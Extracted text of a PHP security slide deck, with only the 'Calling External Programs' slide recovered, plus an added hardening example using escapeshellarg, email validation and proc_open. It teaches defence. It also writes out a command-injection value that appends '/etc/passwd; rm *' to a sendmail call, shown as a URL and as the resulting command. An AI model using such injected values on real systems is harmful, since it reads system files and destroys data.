PHP Security by Uttam Kumar. Email: [email_address]. Mobile: 9730791715
What is Security? [slide bullet text not recovered in extraction]
Secure Web Applications [slide bullet text not recovered in extraction]
PHP & Security [slide bullet text not recovered in extraction]
Never trust the web… [slide bullet text not recovered in extraction]
Never trust the web… (continued) [slide bullet text not recovered in extraction]
XSS attack [slide bullet text not recovered in extraction]
XSS attack (continued) [slide bullet text not recovered in extraction]
SQL Injection [slide bullet text not recovered in extraction]
Calling External Programs

Sometimes you need to call external programs (using system(), exec(), popen(), passthru(), or the back-tick operator). This is extremely dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg() or escapeshellcmd() so that users can't trick the system into executing arbitrary commands.

<?php $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w'); ?>

The user could control $to to yield:

http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A

which would result in running the command:

/usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm *

A solution would be:

$fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');
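The following is an added example, not code from the slides, showing the slide's popen() pattern next to two hardened forms: the escapeshellarg() fix the slide recommends, combined with input validation, and a shell-free variant. The function names (unsafe_command, safe_command, send_without_shell) are mine, the recipient addresses are constructed test input, and the array form of proc_open() assumes PHP 7.4 or later.

```php
<?php
// Added example (not from the original slides): hardening the sendmail
// popen() call. Assumes the recipient comes from a request parameter;
// every address below is constructed test input, nothing is sent.

declare(strict_types=1);

const SENDMAIL = '/usr/sbin/sendmail';

/**
 * The slide's vulnerable pattern, kept only to show what string reaches
 * the shell: the recipient is concatenated straight into the command line,
 * so any shell metacharacters in it are interpreted by the shell.
 */
function unsafe_command(string $to): string
{
    return SENDMAIL . ' -i ' . $to;
}

/**
 * Hardened variant: first reject anything that is not a single e-mail
 * address, then quote the remaining value with escapeshellarg() so the
 * shell treats it as exactly one argument.
 */
function safe_command(string $to): string
{
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('recipient is not a valid e-mail address');
    }
    return SENDMAIL . ' -i ' . escapeshellarg($to);
}

/**
 * Strongest option on PHP >= 7.4: hand proc_open() an argument array.
 * The program is executed directly, with no shell in between, so there is
 * nothing for metacharacters to act on. Validation is still applied so a
 * bad address fails early rather than being passed to sendmail.
 */
function send_without_shell(string $to, string $message): bool
{
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    $descriptors = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open([SENDMAIL, '-i', $to], $descriptors, $pipes);
    if (!is_resource($proc)) {
        return false;
    }
    fwrite($pipes[0], $message);
    foreach ($pipes as $pipe) {
        fclose($pipe);
    }
    return proc_close($proc) === 0;
}

// Constructed inputs: a legitimate recipient and the hostile value from the
// slide. Both are only formatted here, never executed.
$inputs = [
    'alice@example.org',
    'evil@evil.org /etc/passwd; rm *',
];

foreach ($inputs as $to) {
    echo "input:  $to\n";
    echo "unsafe: " . unsafe_command($to) . "\n";
    try {
        echo "safe:   " . safe_command($to) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "safe:   rejected (" . $e->getMessage() . ")\n";
    }
    echo "\n";
}
```

Two points the slide leaves implicit: escapeshellarg() is applied to each individual argument, whereas escapeshellcmd() is meant for a whole command string and does not stop an attacker from adding extra arguments, so the per-argument form is the one to reach for here; and validating the value (here with FILTER_VALIDATE_EMAIL) before it gets anywhere near a command line is a cheaper, earlier check than escaping, while the argument-array form of proc_open() removes the shell from the picture altogether.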
Questions…????
Thank You !!